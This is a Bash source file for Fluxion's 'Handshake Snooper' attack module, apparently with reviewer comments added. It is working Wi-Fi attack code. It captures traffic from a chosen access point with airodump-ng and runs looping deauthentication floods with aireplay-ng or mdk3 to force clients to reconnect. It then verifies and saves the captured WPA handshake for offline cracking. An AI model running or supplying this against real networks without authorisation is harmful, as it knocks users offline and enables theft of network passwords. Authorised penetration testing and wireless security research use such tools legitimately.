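#!/bin/bash
#
# Handshake Snooper attack module.
#
# Defines the prep_attack / start_attack / stop_attack / unprep_attack entry
# points plus their helpers. Nothing runs at load time except the state reset
# below. The functions rely on globals and helpers that are not defined in this
# file (FLUXIONWorkspacePath, FLUXIONPath, FLUXIONOutputDevice, APTarget*,
# WIMonitor, io_query_choice, sandbox_remove_workfile, hash_check_handshake, ...).
#
# Artifacts written by this module:
#   $FLUXIONWorkspacePath/handshake_snooper.log       arbiter log
#   $FLUXIONWorkspacePath/capture/                    working capture files
#   $FLUXIONWorkspacePath/mdk3_blacklist.lst          target list for mdk3
#   $FLUXIONPath/attacks/Handshake Snooper/handshakes/  verified captures

########################### < Handshake Snooper Parameters > ###########################

# Life cycle: "Not Ready" -> "Ready" (prep_attack) -> "Running" (start_attack)
# -> "Stopped" (stop_attack); unprep_attack resets it to "Not Ready".
HandshakeSnooperState="Not Ready"

################################# < Handshake Snooper > ################################

#######################################
# Background loop: capture, periodically verify, and store a handshake.
# Arguments: $1 - PID that is sent SIGABRT once a handshake has been stored.
# Returns:   1 if $1 is missing or the module is not in the "Running" state.
#            Exits with status 2 when aborted through SIGABRT.
#######################################
function handshake_snooper_arbiter_daemon() {
  # Two separate tests instead of the ambiguous, deprecated `[ a -o b ]` form.
  if [ $# -lt 1 ] || [ "$HandshakeSnooperState" != "Running" ]; then
    return 1
  fi

  # Start daemon in the running state to continue execution until aborted,
  # or until a hash has been verified to exist in the capture file.
  # NOTE: The line below must remain before trap to prevent race conditions.
  local handshake_snooper_arbiter_daemon_state="running"

  # SIGABRT handler: close the log viewer, stop both helper processes,
  # record the abort in the log and leave the daemon with status 2.
  function handshake_snooper_arbiter_daemon_abort() {
    handshake_snooper_arbiter_daemon_state="aborted"
    if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then
      kill "$handshake_snooper_arbiter_daemon_viewerPID"
    fi

    handshake_snooper_stop_deauthenticator
    handshake_snooper_stop_captor

    echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" \
      >> "$FLUXIONWorkspacePath/handshake_snooper.log"
    exit 2
  }

  trap handshake_snooper_arbiter_daemon_abort SIGABRT

  # Relative paths: resolved against the current working directory.
  source lib/HashUtils.sh
  source lib/ColorUtils.sh

  # Cleanup files we've previously created to avoid conflicts.
  # The glob is passed quoted, exactly as before; presumably the helper expands
  # it itself - confirm in sandbox_remove_workfile.
  sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"

  # Display some feedback to the user to assure verifier is working.
  # shellcheck disable=SC2086 # FLUXIONHoldXterm / BOTTOMLEFT are left unquoted
  # as in the original; presumably they hold zero or more xterm options.
  xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \
    -title "Handshake Snooper Arbiter Log" \
    -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" &
  local handshake_snooper_arbiter_daemon_viewerPID=$!

  # '>' truncates the log, so every run starts with a fresh file.
  echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" \
    > "$FLUXIONWorkspacePath/handshake_snooper.log"

  handshake_snooper_start_captor
  handshake_snooper_start_deauthenticator

  # Assume it hasn't been verified yet (1 => false/error).
  local handshake_snooper_arbiter_daemon_verified=1

  # Keep snooping and verifying until we've got a valid hash from the capture file.
  while [ "$handshake_snooper_arbiter_daemon_verified" -ne 0 ]; do
    # shellcheck disable=SC2086 # the notice is handed to io_dynamic_output
    # unquoted, as in the original; confirm the helper's argument contract
    # before quoting it.
    echo -e "[$(env -i date '+%H:%M:%S')] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" \
      >> "$FLUXIONWorkspacePath/handshake_snooper.log"

    # Using wait to asynchronously catch flags while waiting.
    sleep "$HANDSHAKEVerifierInterval" &
    wait $!

    # If synchronously searching, stop the captor and deauthenticator before checking.
    if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then
      echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" \
        >> "$FLUXIONWorkspacePath/handshake_snooper.log"
      handshake_snooper_stop_deauthenticator
      handshake_snooper_stop_captor
      mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \
        "$FLUXIONWorkspacePath/capture/recent.cap"
    else
      # Non-blocking: copy a stripped snapshot while the capture keeps running.
      pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \
        -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive \
        &> "$FLUXIONOutputDevice"
    fi

    echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" \
      >> "$FLUXIONWorkspacePath/handshake_snooper.log"
    hash_check_handshake "$HANDSHAKEVerifierIdentifier" \
      "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC"
    handshake_snooper_arbiter_daemon_verified=$?

    # If synchronously searching, restart the captor and deauthenticator after checking.
    if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ] \
      && [ "$handshake_snooper_arbiter_daemon_verified" -ne 0 ]; then
      sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*"

      handshake_snooper_start_captor
      handshake_snooper_start_deauthenticator
    fi
  done

  # Assure all processes are stopped before proceeding.
  handshake_snooper_stop_deauthenticator
  handshake_snooper_stop_captor

  # Declared separately so `local` does not mask the exit status of date.
  local completionTime
  completionTime=$(env -i date '+%H:%M:%S')
  echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" \
    >> "$FLUXIONWorkspacePath/handshake_snooper.log"
  echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" \
    >> "$FLUXIONWorkspacePath/handshake_snooper.log"

  # Assure we've got a directory to store hashes into.
  mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/"

  # Move handshake to storage if one was acquired.
  # NOTE(review): the destination name embeds APTargetSSIDClean, which derives
  # from a network name chosen by whoever operates the access point. This
  # assumes path separators and leading dots were already stripped from it -
  # confirm where APTargetSSIDClean is computed.
  mv "$FLUXIONWorkspacePath/capture/recent.cap" \
    "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap"

  # Signal parent process the verification terminated.
  kill -s SIGABRT "$1"
}

#######################################
# Stop the capture process, if one is recorded, and forget its PID.
# Globals: HANDSHAKECaptorPID (read, cleared), FLUXIONOutputDevice (read)
#######################################
function handshake_snooper_stop_captor() {
  if [ "$HANDSHAKECaptorPID" ]; then
    # shellcheck disable=SC2086 # intentionally unquoted: the value comes from
    # pgrep -P and holds one PID per line when the xterm has several children.
    kill -s SIGINT $HANDSHAKECaptorPID &> "$FLUXIONOutputDevice"
  fi

  HANDSHAKECaptorPID=""
}

#######################################
# Start airodump-ng in its own xterm, filtered to the target BSSID and channel,
# writing to $FLUXIONWorkspacePath/capture/dump*.
# Globals: HANDSHAKECaptorPID (written), HandshakeSnooperState (read)
# Returns: 0 if a captor is already recorded, 1 if the state is not "Running".
#######################################
function handshake_snooper_start_captor() {
  if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
  if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi

  handshake_snooper_stop_captor

  # shellcheck disable=SC2086 # FLUXIONHoldXterm / TOPLEFT are left unquoted as
  # in the original; presumably they hold zero or more xterm options.
  xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" \
    $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \
    airodump-ng --ignore-negative-one -d "$APTargetMAC" \
    -w "$FLUXIONWorkspacePath/capture/dump" -c "$APTargetChannel" \
    -a "$WIMonitor" &
  local parentPID=$!

  # $! is the xterm; the PID wanted is its child.
  # NOTE(review): this polls forever if the xterm never gains a child, for
  # example when it fails to start.
  while [ ! "$HANDSHAKECaptorPID" ]; do
    sleep 1 &
    wait $!
    HANDSHAKECaptorPID=$(pgrep -P "$parentPID")
  done
}

#######################################
# Stop the deauthentication xterm, if one is recorded, and forget its PID.
# Globals: HANDSHAKEDeauthenticatorPID (read, cleared), FLUXIONOutputDevice (read)
#######################################
function handshake_snooper_stop_deauthenticator() {
  if [ "$HANDSHAKEDeauthenticatorPID" ]; then
    kill "$HANDSHAKEDeauthenticatorPID" &> "$FLUXIONOutputDevice"
  fi

  HANDSHAKEDeauthenticatorPID=""
}

#######################################
# Start the deauthentication loop selected by HANDSHAKEDeauthenticatorIdentifier
# in its own xterm. Identifiers matching neither the aireplay nor the mdk3
# option start nothing.
#
# Each pass pauses 7 s and then runs the tool for at most 3 s, so the activity
# shows up on the air as periodic bursts of deauthentication frames - the kind
# of pattern wireless IDS deauthentication-flood rules look for. Networks
# enforcing 802.11w (Protected Management Frames) discard such unauthenticated
# frames.
#
# Globals: HANDSHAKEDeauthenticatorPID (written), HandshakeSnooperState (read)
# Returns: 0 if a deauthenticator is already recorded, 1 if not "Running".
#######################################
function handshake_snooper_start_deauthenticator() {
  if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
  if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi

  handshake_snooper_stop_deauthenticator

  # Prepare deauthenticators
  case "$HANDSHAKEDeauthenticatorIdentifier" in
    "$HandshakeSnooperMdk3MethodOption")
      # Redirect target quoted: unquoted, a workspace path containing
      # whitespace makes the redirection fail.
      echo "$APTargetMAC" > "$FLUXIONWorkspacePath/mdk3_blacklist.lst"
      ;;
  esac

  # Start deauthenticators.
  # NOTE(review): the -e argument is a single string that xterm hands to a
  # shell, so APTargetMAC, WIMonitor, APTargetChannel and the workspace path
  # are re-parsed as shell text. This assumes those values were validated
  # before reaching this function - confirm at the point where they are set.
  # shellcheck disable=SC2086 # FLUXIONHoldXterm / BOTTOMRIGHT left unquoted as
  # in the original; presumably they hold zero or more xterm options.
  case "$HANDSHAKEDeauthenticatorIdentifier" in
    "$HandshakeSnooperAireplayMethodOption")
      xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
        -title "Deauthenticating all clients on $APTargetSSID" -e \
        "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" &
      HANDSHAKEDeauthenticatorPID=$!
      ;;
    "$HandshakeSnooperMdk3MethodOption")
      # The list path is wrapped in escaped quotes, matching the tail -f
      # command string used for the log viewer.
      xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
        -title "Deauthenticating all clients on $APTargetSSID" -e \
        "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\" -c $APTargetChannel; done" &
      HANDSHAKEDeauthenticatorPID=$!
      ;;
  esac
}

# Clear the selected deauthentication method.
function handshake_snooper_unset_deauthenticator_identifier() {
  HANDSHAKEDeauthenticatorIdentifier=""
}

#######################################
# Ask for the deauthentication method unless one is already selected.
# Globals: HANDSHAKEDeauthenticatorIdentifier (written), IOQueryChoice (read)
# Returns: 0 when a method is selected, 1 when the "back" option was chosen.
#######################################
function handshake_snooper_set_deauthenticator_identifier() {
  if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi

  handshake_snooper_unset_deauthenticator_identifier

  local methods=(
    "$HandshakeSnooperMonitorMethodOption"
    "$HandshakeSnooperAireplayMethodOption"
    "$HandshakeSnooperMdk3MethodOption"
    "$FLUXIONGeneralBackOption"
  )
  # The array is passed by name ("methods[@]"), not by value.
  io_query_choice "$HandshakeSnooperMethodQuery" methods[@]

  # The chosen menu label itself is stored as the identifier.
  HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice

  echo

  if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then
    handshake_snooper_unset_deauthenticator_identifier
    return 1
  fi
}

# Clear the selected handshake verifier.
function handshake_snooper_unset_verifier_identifier() {
  HANDSHAKEVerifierIdentifier=""
}

#######################################
# Ask which tool verifies the capture unless one is already selected.
# Globals: HANDSHAKEVerifierIdentifier (written: "pyrit" or "aircrack-ng")
# Returns: 0 when a verifier is selected, 1 when the "back" option was chosen.
#######################################
function handshake_snooper_set_verifier_identifier() {
  if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi

  handshake_snooper_unset_verifier_identifier

  local choices=(
    "$FLUXIONHashVerificationMethodPyritOption"
    "$FLUXIONHashVerificationMethodAircrackOption"
    "$FLUXIONGeneralBackOption"
  )
  io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]

  echo

  case "$IOQueryChoice" in
    "$FLUXIONHashVerificationMethodPyritOption")
      HANDSHAKEVerifierIdentifier="pyrit"
      ;;
    "$FLUXIONHashVerificationMethodAircrackOption")
      HANDSHAKEVerifierIdentifier="aircrack-ng"
      ;;
    "$FLUXIONGeneralBackOption")
      handshake_snooper_unset_verifier_identifier
      return 1
      ;;
  esac
}

# Clear the selected verification interval.
function handshake_snooper_unset_verifier_interval() {
  HANDSHAKEVerifierInterval=""
}

#######################################
# Ask how often the capture is verified unless an interval is already selected.
# Globals: HANDSHAKEVerifierInterval (written: 30, 60 or 90 seconds)
# Returns: 0 when an interval is selected, 1 when the "back" option was chosen.
#######################################
function handshake_snooper_set_verifier_interval() {
  if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi

  handshake_snooper_unset_verifier_interval

  local choices=(
    "$HandshakeSnooperVerifierInterval30SOption"
    "$HandshakeSnooperVerifierInterval60SOption"
    "$HandshakeSnooperVerifierInterval90SOption"
    "$FLUXIONGeneralBackOption"
  )
  io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@]

  case "$IOQueryChoice" in
    "$HandshakeSnooperVerifierInterval30SOption")
      HANDSHAKEVerifierInterval=30
      ;;
    "$HandshakeSnooperVerifierInterval60SOption")
      HANDSHAKEVerifierInterval=60
      ;;
    "$HandshakeSnooperVerifierInterval90SOption")
      HANDSHAKEVerifierInterval=90
      ;;
    "$FLUXIONGeneralBackOption")
      handshake_snooper_unset_verifier_interval
      return 1
      ;;
  esac
}

# Clear the selected verifier synchronicity.
function handshake_snooper_unset_verifier_synchronicity() {
  HANDSHAKEVerifierSynchronicity=""
}

#######################################
# Ask whether verification pauses the capture ("blocking") or runs alongside
# it ("non-blocking") unless a mode is already selected.
# Globals: HANDSHAKEVerifierSynchronicity (written)
# Returns: 0 when a mode is selected, 1 when the "back" option was chosen.
#######################################
function handshake_snooper_set_verifier_synchronicity() {
  if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi

  handshake_snooper_unset_verifier_synchronicity

  local choices=(
    "$HandshakeSnooperVerifierSynchronicityAsynchronousOption"
    "$HandshakeSnooperVerifierSynchronicitySynchronousOption"
    "$FLUXIONGeneralBackOption"
  )
  io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@]

  case "$IOQueryChoice" in
    "$HandshakeSnooperVerifierSynchronicityAsynchronousOption")
      HANDSHAKEVerifierSynchronicity="non-blocking"
      ;;
    "$HandshakeSnooperVerifierSynchronicitySynchronousOption")
      HANDSHAKEVerifierSynchronicity="blocking"
      ;;
    "$FLUXIONGeneralBackOption")
      handshake_snooper_unset_verifier_synchronicity
      return 1
      ;;
  esac
}

#######################################
# Reset every selection, mark the module "Not Ready" and remove the capture
# working directory.
#######################################
function unprep_attack() {
  HandshakeSnooperState="Not Ready"

  handshake_snooper_unset_verifier_synchronicity
  handshake_snooper_unset_verifier_interval
  handshake_snooper_unset_verifier_identifier
  handshake_snooper_unset_deauthenticator_identifier

  sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
}

#######################################
# Walk through the four selection menus. Choosing "back" in a menu clears the
# previous selection and restarts from the first menu still unset; choosing
# "back" in the first menu abandons preparation.
# Returns: 1 (after unprep_attack) when preparation was abandoned.
#######################################
function prep_attack() {
  mkdir -p "$FLUXIONWorkspacePath/capture"

  while true; do
    if ! handshake_snooper_set_deauthenticator_identifier; then
      break
    fi
    if ! handshake_snooper_set_verifier_identifier; then
      handshake_snooper_unset_deauthenticator_identifier
      continue
    fi
    if ! handshake_snooper_set_verifier_interval; then
      handshake_snooper_unset_verifier_identifier
      continue
    fi
    if ! handshake_snooper_set_verifier_synchronicity; then
      handshake_snooper_unset_verifier_interval
      continue
    fi
    HandshakeSnooperState="Ready"
    break
  done

  # Check for handshake abortion.
  if [ "$HandshakeSnooperState" != "Ready" ]; then
    unprep_attack
    return 1
  fi
}

#######################################
# Abort the arbiter daemon (SIGABRT triggers its cleanup handler) and mark the
# module "Stopped".
#######################################
function stop_attack() {
  if [ "$HANDSHAKEArbiterPID" ]; then
    kill -s SIGABRT "$HANDSHAKEArbiterPID" &> "$FLUXIONOutputDevice"
  fi

  HANDSHAKEArbiterPID=""

  HandshakeSnooperState="Stopped"
}

#######################################
# Launch the arbiter daemon in the background, handing it this shell's PID.
# Returns: 0 if already "Running", 1 unless the state is "Ready".
#######################################
function start_attack() {
  if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi
  if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi
  HandshakeSnooperState="Running"

  handshake_snooper_arbiter_daemon $$ &> "$FLUXIONOutputDevice" &
  HANDSHAKEArbiterPID=$!
}

# FLUXSCRIPT END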